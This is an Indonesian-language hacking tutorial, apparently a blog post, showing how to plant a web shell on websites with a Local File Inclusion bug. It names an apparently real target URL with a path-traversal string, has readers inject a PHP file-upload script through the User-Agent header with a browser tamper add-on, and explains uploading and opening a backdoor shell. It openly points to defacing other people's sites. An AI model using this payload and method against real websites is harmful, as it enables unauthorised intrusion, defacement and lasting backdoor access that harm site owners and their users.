Backdoor/Tanam Shell Melalui Lfi
Tanam Shell/Backdoor Melalui LFI
sekedar menyebarkan pengetahuan,buat yang belum tau aja ,klo yang udah master niscaya dah tau trick ini
bagai mana cara melaksanakan hacking/deface atau sejenisnya terhadap sebuah website yang memiliki bugs LFI. owkeh,langkah pertama ialah cari sasaran anda sanggup memanfaatkan bugs lfi yang banyak bertebaran di google atau juga memakai tools,scanner :D
Anggap saja kita sudah menemukan target
yang vuln,hasil scan kita di mirc
tamper data sudah di instal,klo belom,instal dulu https://addons.mozilla.org/en-US/firefox/addon/966/
contoh sasaran yang kita temukan yaitu
http://old.diendandulich.com/diendan//index.php?option=com_g2bridge&controller=
../../../../../../../../
buka mozilla dan temper data anda
tools->tamper data
klik star tamper
lalu load broser yang tadi
maka akan muncul command
dan klik tamper
pada kolom user agent masukkan script berikut :
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl"
value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload
SUKSES !!!</b><br><br>'; }
else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>
kemudian tekan OK,apabila script berhasil di injeksikan kedalam web tersebut maka akan muncul
tampilan form upload, nah pada sesion inilah anda sanggup melaksanakan uploading shell :D
lalu upload shell anda,maka akan muncul kembali form tamper data tersebut,masukkan kembali script di atas,apa jikalau shell berhasil ter upload kedalam web tersebut,maka akan muncul goresan pena UPLOAD SUKSES :D
Sekarang shell anda berhasil di injeksikan ke dalam web tersebut,untuk mengaksesnya anda tinggal mengetikkan di browser anda
http://www/target.com/nama shell.php
lalu setetlah itu terserah anda, sekian dulu triknya,sekedar share pengetahuan yang aku punya.